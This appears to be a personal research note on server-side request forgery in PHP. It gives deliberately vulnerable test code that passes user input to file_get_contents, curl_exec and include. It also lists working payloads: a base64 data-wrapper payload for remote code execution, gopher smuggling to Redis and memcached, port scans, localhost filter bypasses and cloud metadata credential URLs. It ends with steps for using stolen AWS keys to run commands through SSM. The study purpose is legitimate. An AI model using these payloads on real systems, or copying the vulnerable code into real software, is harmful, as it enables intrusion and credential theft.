SSRF

This research series focuses on Server-Side Request Forgery (SSRF) scenarios and will be updated periodically. The goal is to explore SSRF across different technology stacks and real-world scenarios

This Page covers:

• Tester Code to test SSRF into php and how to test with different protocols.

• AWS credentials leak and what to do after

• Basic SSRF Bypasses

What is the intention:

The purpose of this research is to understand how different programming languages and environments behave when handling external requests, how SSRF vulnerabilities can be exploited, and how they can be effectively mitigated.

PHP

<?php

if (!isset($_GET['url'])){
	echo "Provide url as: ?url";
	exit;
}

$url = $_GET['url'];
$output = file_get_contents($url);
echo "<pre>";
echo htmlspecialchars($output);
echo "</pre>";

?>

file_get_contents accepts urls too. PHP doesn't see urls What it actually sees are: wrappers like:

http://, file:/// and they tell PHP how to proceed. Hands it to stream wrapper. Wrapper decides how to read data So we are not abusing PHP but I/O abstractions.

Wrapper	Purpose	SSRF relevance
http://	HTTP requests	⭐⭐⭐
https://	HTTPS	⭐⭐⭐
file://	Local files	⭐⭐⭐
php://	PHP internals	⭐⭐
ftp://	FTP	⭐⭐
gopher://	Raw TCP	⭐⭐⭐⭐
SSRF can be one-way also as the data we send , sometimes backend can't parse that properly and we can't get human readable replies too.

Variant 2:

sudo apt install php-curl

curl based:

if (isset($_GET['curl'])){
$ch = curl_init($_GET['curl']);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
echo curl_exec($ch);
}

Fetcher	Internals
file_get_contents()	PHP stream wrappers
curl_exec()	libcurl + PHP glue
Code we using to test:

<?php
error_reporting(E_ALL);
echo "Supported Wrappers:\n";
print_r(stream_get_wrappers());

echo "\nSupported Transports (for fsockopen):\n";
print_r(stream_get_transports());


if (isset($_GET['url'])) {
    $response = file_get_contents($_GET['url']);
    echo "<pre>";
    echo htmlspecialchars($response);
    echo "</pre>";
}
if (isset($_GET['curl'])) {
    $location = $_GET['curl'];
    $ch = curl_init();
    
    // Fix: Pass the actual URL variable here
    curl_setopt($ch, CURLOPT_URL, $location); 
    
    // Optional: Return the transfer as a string instead of outputting it immediately
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
    $result = curl_exec($ch);
    echo htmlspecialchars($result); // Display the result safely
    
    curl_close($ch);
}
?>

This code is better to test PHP Behavior:

<?php
/**
 * PHP SSRF & Stream Wrapper Research Lab
 * Focus: Impact analysis of file_get_contents vs curl_exec vs include
 */

// Force plain text for clean terminal-style output in browser
header("Content-Type: text/plain; charset=utf-8");
error_reporting(E_ALL);
set_time_limit(5); // Prevent infinite loops during timeout research

function banner($title) {
    echo "\n" . str_repeat("=", 10) . " {$title} " . str_repeat("=", 10) . "\n";
}

/**
 * Helper to measure execution time. 
 * Essential for Blind SSRF / Port Scanning research.
 */
function timed($fn) {
    $start = microtime(true);
    $result = $fn();
    $end = microtime(true);
    echo "[Time] " . round(($end - $start) * 1000, 2) . " ms\n";
    return $result;
}

// 1. ENVIRONMENT INTROSPECTION
banner("PHP CONFIGURATION");
echo "PHP Version      : " . PHP_VERSION . "\n";
echo "allow_url_fopen  : " . (ini_get("allow_url_fopen") ? "ON" : "OFF") . "\n";
echo "allow_url_include: " . (ini_get("allow_url_include") ? "ON" : "OFF") . " (Req for RCE via include)\n";
echo "OS               : " . PHP_OS . "\n";

banner("SUPPORTED WRAPPERS (file_get_contents)");
print_r(stream_get_wrappers());

banner("SUPPORTED TRANSPORTS (fsockopen)");
print_r(stream_get_transports());

if (extension_loaded('curl')) {
    banner("CURL PROTOCOLS");
    $version = curl_version();
    print_r($version['protocols']);
} else {
    echo "\n[!] Warning: cURL extension not installed.\n";
}


// 2. VECTOR: file_get_contents()
// Best for: php://filter, data://, and local file:// access
if (isset($_GET['url'])) {
    banner("VECTOR: file_get_contents()");
    $url = $_GET['url'];
    echo "Target: {$url}\n";

    $data = timed(function() use ($url) {
        // @ suppresses warnings to keep output clean; results are handled by check
        return @file_get_contents($url);
    });

    if ($data === false) {
        echo "Status: FAILED (Check allow_url_fopen or protocol support)\n";
    } else {
        echo "Length: " . strlen($data) . " bytes\n";
        echo "Content Preview:\n" . str_repeat("-", 20) . "\n";
        echo htmlspecialchars(substr($data, 0, 1000)) . "\n";
    }
}


// 3. VECTOR: curl_exec()
// Best for: dict://, gopher://, ldap://, and advanced network smuggling
if (isset($_GET['curl'])) {
    banner("VECTOR: curl_exec()");
    $url = $_GET['curl'];
    echo "Target: {$url}\n";

    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL => $url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false, // Research tip: Set to true to test redirect bypasses
        CURLOPT_TIMEOUT => 5,
        CURLOPT_CONNECTTIMEOUT => 3,
        CURLOPT_SSL_VERIFYPEER => false, // Allow testing against self-signed internal SSL
        CURLOPT_SSL_VERIFYHOST => false
    ]);

    $data = timed(function() use ($ch) {
        return curl_exec($ch);
    });

    $error = curl_error($ch);
    $info = curl_getinfo($ch);

    echo "HTTP Code : " . $info['http_code'] . "\n";
    if ($error) echo "Curl Error: {$error}\n";

    if ($data !== false) {
        echo "Length    : " . strlen($data) . " bytes\n";
        echo "Content Preview:\n" . str_repeat("-", 20) . "\n";
        echo htmlspecialchars(substr($data, 0, 1000)) . "\n";
    }
    curl_close($ch);
}


// 4. VECTOR: include()
// Best for: Turning SSRF/LFI into RCE (data://, php://input)
if (isset($_GET['inc'])) {
    banner("VECTOR: include()");
    $target = $_GET['inc'];
    echo "Attempting to include: {$target}\n";
    echo "Execution Output:\n" . str_repeat("-", 20) . "\n";

    timed(function() use ($target) {
        // Warning: This is extremely dangerous. Only run in an isolated lab.
        @include($target);
    });
}
?>

Instructions for your Research Lab

1. Read Source via SSRF (Exfiltration): ?url=php://filter/convert.base64-encode/resource=ssrf.php

2. RCE via Data Wrapper: ?inc=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg== (Note: This requires allow_url_include = On in your php.ini).

3. Internal Port Scanning (Timing): ?curl=dict://127.0.0.1:22 (Compare time to a closed port like ?curl=dict://127.0.0.1:9999)

4. Protocol Smuggling (Redis): ?curl=gopher://127.0.0.1:6379/_%250d%250aINFO%250d%250aQUIT%250d%250a

Function	Executes code?
file_get_contents()	❌
curl_exec()	❌
include()	✅
require()	✅
eval()	✅
unserialize()	✅

Attacks

Cloud Metdata:

• AWS/OpenStack: http://169.254.169.254/latest/meta-data/iam/security-credentials/

• Google Cloud: http://metadata.google.internal/computeMetadata/v1/ (Requires a specific header, but sometimes bypassable via older API versions).

• Azure: http://169.254.169.254/metadata/instance?api-version=2021-02-01

2. RCE via PHP Wrappers

PHP supports various URI schemes (wrappers) that can be devastating when passed to file_get_contents() or curl.

• expect://: If the expect extension is enabled, you can run shell commands directly: ?url=expect://id The expect:// wrapper is not a default PHP feature. It is part of the PECL expect extension. On a standard Kali or Debian install, this is almost never installed by default. Try with:

php -m | grep -i expect

• php://filter: Useful for bypasses. You can base64 encode local files so they don't get executed/rendered before you read them: ?url=php://filter/convert.base64-encode/resource=ssrf.php

• phar://: Can lead to deserialization attacks if you can upload a phar file to the server first.

4. Bypassing the "Localhost" Block

Even if a dev blocks 127.0.0.1, you can try:

• Decimal Encoding: http://2130706433/

• Hex Encoding: http://0x7f000001/

• Alternative Local IPs: http://0.0.0.0/ or http://[::]/ (IPv6)

• DNS Aliases: Register a domain like spoof.com and point its A record to 127.0.0.1.

# Use alternative representations
<http://①②⑦.⓪.⓪.①>  (Unicode numbers)
<http://127>。0。0。1  (Unicode dots)
<http://127.0.0.1.nip.io>
<http://127.0.0.1.xip.io>
<http://spoofed.burpcollaborator.net>

# Domain concatenation
<http://127.0.0.1.trusted-domain.com>
<http://trusted-domain.com@127.0.0.1>
<http://127.0.0.1#trusted-domain.com>

# Open Redirect chaining
<http://trusted-domain.com/redirect?url=http://169.254.169.254>

Lab Exercise: Redis to RCE

If we have Redis installed on your Kali machine (listening on 127.0.0.1:6379 with no password), try to use the gopher:// protocol to write a small PHP file to your /home/kali/web/ directory.

Practical:

dict:// (Internal Recon)

The Dictionary Protocol is amazing for port scanning. Since it's designed to fetch definitions, if a port is open and sends a banner (like SSH or Redis), dict will show it to you. Scanning for web service: ?curl=dict://127.0.0.1:80/info ![[Pasted image 20260201232548.png]]

http://localhost:8080/ssrf.php?curl=dict://127.0.0.1:80/

Works in curl we can also check for protocols in:

php -i | grep -i protocols

➜  SSRF php -i | grep -i "Protocols"
Protocols => dict, file, ftp, ftps, gopher, gophers, http, https, imap, imaps, ldap, ldaps, mqtt, pop3, pop3s, rtmp, rtmpe, rtmps, rtmpt, rtmpte, rtmpts, rtsp, scp, sftp, smb, smbs, smtp, smtps, telnet, tftp, ws, wss

PHP wrappers

?url=php://filter/convert.base64-encode/resource=ssrf.php

Gophers

Gopher is an application-layer protocol that provides the ability to extract and view Web documents stored on remote Web servers.

curl=gopher://127.0.0.1:6379/_SET%20key%20value%0d%0aQUIT%0d%0a

Doesn't work , Need to research why

• Gopher with HTTP

gopher://yourproxyserver:8080/_GET http://hacker:80>/x HTTP/1.1%0A%0A

Internal Port Scanning

Try connecting to memcached:

gopher://127.0.0.1:11211/_stats%0d%0a

Data://

http://localhost:8080/ssrf.php?url=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo=

We can print the output doesn't execute.

Other protocols to try:

• sftp://

?url=sftp://evil.com:1337/

• ldap:// or ldaps:// or ldapi://

?url=ldap://localhost:1337/%0astats%0aquit

• tftp://

• jar:

Payloads:

@ removes domain whitelistings

?curl=http://google.com@127.0.0.1:22

• http://myid.ostify.com/ Normal URL

• //myid.ostify.com double slashes ahead

• myid.ostify.com subdomain direrct

• .myid.ostify.com dot ahead

Some non usual ways to find

# Parameter fuzzing with common SSRF params
ffuf -w ssrf-params.txt -u "<https://target.com/api/endpoint?FUZZ=http://burp-collab>"

# common wordlist includes:
url, uri, path, dest, destination, target, source, src,
redirect, callback, return, return_url, next, continue,
proxy, feed, rss, xml, file, document, link, reference

Good Blogs

• SSRF to XSS and Internal Port scanning via custom server

• AWS ssrf to RCE Got AWS Keys , now what report? NO

1. Install and configure AWS CLI by using the above security credentials.

$ export AWS_ACCESS_KEY_ID=
$ export AWS_SECRET_ACCESS_KEY=
$ export AWS_DEFAULT_REGION=
$ export AWS_SESSION_TOKEN=

1. How to find region

http://169.254.169.254/latest/meta-data/placement/availability-zone

1. command execution

aws ssm send-command --document-name "AWS-RunShellScript" --comment "AnyComment" --instance-ids="[Instance-id]" --parameters "commands=whoami"

How to get instance ID?: http://169.254.169.254/latest/meta-data/instance-id 4. Get the output of command:

aws ssm list-command-invocations --command-id="[Command_Id]" --details